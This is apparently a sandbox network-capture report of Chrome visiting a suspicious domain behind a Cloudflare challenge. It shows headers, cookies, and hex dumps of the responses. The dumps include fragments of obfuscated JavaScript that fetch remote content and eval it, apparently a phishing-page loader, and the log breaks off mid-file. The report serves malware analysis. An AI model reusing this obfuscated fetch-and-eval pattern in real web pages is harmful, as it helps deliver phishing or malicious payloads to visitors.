                                    Data Ascii: l60Kj6ZgZwdO2raHEjGlYp4.0dA6kSX9milGOQ680CFJxE3dS09rhuWVECdGgpKahzNb6RHkrAgM_0NcuIS0N0RGgZBHz60neQmrmuukFZSSxB9kk5MEF.g0.kxefvrCKGimi.5SEO6FHB0bHXi3wEZYFNkrjyEwpRkQwIbpOzInUO9HTb0MH.Zts.nS7Zxw3Xt1Vlx5UAzAp52aTgAoMNqzN0ZdwKiK0WZLSG5WX1OECEYvTT_MUAytJ3Z2SKx


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.449797104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:22 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:22 UTC718INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:22 GMT
                                    Content-Type: application/json
                                    Content-Length: 7
                                    Connection: close
                                    cf-chl-out: 5ihPIvxpIY502NWrVRFIkQ==$3sUoyaqXS5Vl1MxQFh8mEQ==
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2iigghEMeYTGuaF1BuccKlUpSQ9xH6cMjb9kHi7hIKWnr75opPpVg8iu%2FyCryREZKnbQIb%2BjLO2jAMBHWemSQeiALv%2FsmU9OaZVk6C5H6ComXEA4DAkZccKeLU8UixCh8pd3rlv6LcUknM1aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba154bc443bf-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:22 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                    Data Ascii: invalid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.449799104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:23 UTC1409OUTGET /6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Cache-Control: max-age=0
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    Referer: https://gth.miconlinestickbu.store/?__cf_chl_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:23 UTC594INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YFbQuMoymGpBUye0vOR9Zc9AB7LT2ipha4zWCF3gHnApFxZ4rD9TBWsKigL2X63f%2FCigDEPPBqBUs%2B286zr%2Bh8fJyoEJvq%2FHb63N5IF4HBQZ2ubI5xipNMorrdgxROMMJkHGEGtTujpU4Itmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba1c28450f42-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:23 UTC775INData Raw: 31 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 71 2f 36 31 37 62 35 61 37 30 32 61 33 34 64 61 64 64 64 30 33 30 37 31 36 35 30 66 39 35 63 62 65 36 36 36 34 65 30 61 61 33 35 66 31 33 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72
                                    Data Ascii: 1170<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title></title> <script src="jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135"></script> <script sr
                                    2024-05-22 15:09:23 UTC1369INData Raw: 4b 28 30 78 31 35 62 29 29 2f 30 78 38 2a 28 70 61 72 73 65 49 6e 74 28 4b 28 27 30 78 31 38 30 27 29 29 2f 30 78 39 29 3b 69 66 28 58 3d 3d 3d 54 29 62 72 65 61 6b 3b 65 6c 73 65 20 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 79 29 7b 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 49 2c 30 78 36 64 65 66 31 29 29 3b 76 61 72 20 47 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 71 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 54 2c 53 29 7b 76 61 72 20 58 3d 71 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 3b 69 66 28 53 29 7b 76 61 72 20 79 3d 53 5b 74 28 27 30 78 31 34 64 27 29 5d 28 54 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75
                                    Data Ascii: K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x14d')](T,arguments);retu
                                    2024-05-22 15:09:23 UTC1369INData Raw: 30 78 31 34 30 29 5d 5b 6d 28 30 78 31 36 66 29 5d 28 66 29 2c 45 3d 58 5b 79 5d 2c 6e 3d 53 5b 45 5d 7c 7c 57 3b 57 5b 6d 28 27 30 78 31 34 39 27 29 5d 3d 66 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 66 29 2c 57 5b 6d 28 30 78 31 35 64 29 5d 3d 6e 5b 6d 28 30 78 31 35 64 29 5d 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 6e 29 2c 53 5b 45 5d 3d 57 3b 7d 7d 29 3b 56 28 29 3b 76 61 72 20 78 68 74 74 70 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 76 61 72 20 67 3d 5b 27 62 69 6e 64 27 2c 27 6c 69 6e 6b 27 2c 27 63 68 61 69 6e 27 2c 27 32 71 6e 46 73 54 77 27 2c 27 72 65 73 70 6f 6e 73 65 54 65 78 74 27 2c 27 73 65 61 72 63 68 27 2c 27 2e 2f 31 27 2c 27 69 6e 69 74 27 2c 27 72 65 6c 27 2c 27 61 63 74 69 6f
                                    Data Ascii: 0x140)][m(0x16f)](f),E=X[y],n=S[E]||W;W[m('0x149')]=f[m('0x16f')](f),W[m(0x15d)]=n[m(0x15d)][m('0x16f')](n),S[E]=W;}});V();var xhttp=new XMLHttpRequest();function I(){var g=['bind','link','chain','2qnFsTw','responseText','search','./1','init','rel','actio
                                    2024-05-22 15:09:23 UTC959INData Raw: 20 57 3d 53 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 39 29 29 3b 57 3f 58 5b 63 28 27 30 78 31 36 35 27 29 5d 28 57 29 3a 65 76 61 6c 28 53 5b 79 5d 5b 63 28 30 78 31 34 62 29 5d 29 3b 7d 76 61 72 20 45 3d 54 5b 63 28 30 78 31 36 64 29 5d 28 63 28 30 78 31 37 30 29 29 3b 66 6f 72 28 76 61 72 20 79 3d 30 78 30 3b 79 3c 45 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 6e 3d 45 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 61 29 29 3b 69 66 28 6e 26 26 6e 5b 63 28 27 30 78 31 37 64 27 29 5d 28 63 28 30 78 31 35 30 29 29 29 7b 76 61 72 20 75 3d 64 6f 63 75 6d 65 6e 74 5b 63 28 27 30 78 31 37 39 27 29 5d 28 63 28 27 30 78 31 37 30 27 29 29 3b 75 5b 63 28 30 78 31 34 65 29 5d 28 63 28 30 78 31 37
                                    Data Ascii: W=S[y][c('0x146')](c(0x159));W?X[c('0x165')](W):eval(S[y][c(0x14b)]);}var E=T[c(0x16d)](c(0x170));for(var y=0x0;y<E[c('0x155')];y++){var n=E[y][c('0x146')](c(0x15a));if(n&&n[c('0x17d')](c(0x150))){var u=document[c('0x179')](c('0x170'));u[c(0x14e)](c(0x17
                                    2024-05-22 15:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.449802104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:24 UTC1166OUTGET /jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:24 UTC652INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:24 GMT
                                    Content-Type: text/javascript
                                    Content-Length: 85578
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lkn9rHnbf5GtkEagvV%2FLa%2F93UOmug2OZmU3OgPRUMxS8nriqeNDTupuNOOS2OHNnfL%2B8hnDaIBTq%2BYePzosFyVYHzhKwHisX%2BSNkGPyXYY7SOIz4CRTR4TAPrgt0WcV6j15gIp0wHBtvx%2FuHQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba21df1c43e7-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:24 UTC717INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e
                                    Data Ascii: /*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
                                    2024-05-22 15:09:24 UTC1369INData Raw: 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 2e 6d 61 70 28 74 68 69 73
                                    Data Ascii: urn null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this
                                    2024-05-22 15:09:24 UTC1369INData Raw: 21 6e 2e 69 73 41 72 72 61 79 28 61 29 26 26 62 2d 70 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 62 20 69 6e 20 61 29 3b 72 65 74 75 72 6e 20 76
                                    Data Ascii: !n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return v
                                    2024-05-22 15:09:24 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62 5d 2c 62 3d 61 2c 61 3d 63 29 2c 6e 2e 69 73 46 75 6e 63
                                    Data Ascii: unction(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunc
                                    2024-05-22 15:09:24 UTC1369INData Raw: 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 4d 2b 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 2c
                                    Data Ascii: \\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,
                                    2024-05-22 15:09:24 UTC1369INData Raw: 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 77 68 69 6c 65 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d
                                    Data Ascii: a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==
                                    2024-05-22 15:09:24 UTC1369INData Raw: 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 2e 61 74 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e
                                    Data Ascii: gth;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.
                                    2024-05-22 15:09:24 UTC1369INData Raw: 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 29 3a 28 64 65
                                    Data Ascii: tElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(de
                                    2024-05-22 15:09:24 UTC1369INData Raw: 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 7d 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68
                                    Data Ascii: .push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push
                                    2024-05-22 15:09:24 UTC961INData Raw: 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74 28 63 29 3b 63 3d 62 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 68 2e 75 6e 73 68 69 66 74 28 63 29 3b 77 68 69 6c 65 28 67 5b 64 5d 3d 3d 3d 68 5b 64 5d 29 64 2b 2b 3b 72 65 74 75 72 6e 20 64 3f 6b 61 28 67 5b 64 5d 2c 68 5b 64 5d 29 3a 67 5b 64 5d 3d 3d 3d 76 3f 2d 31 3a 68 5b 64 5d 3d 3d 3d 76 3f 31 3a 30 7d 2c 6e 29 3a 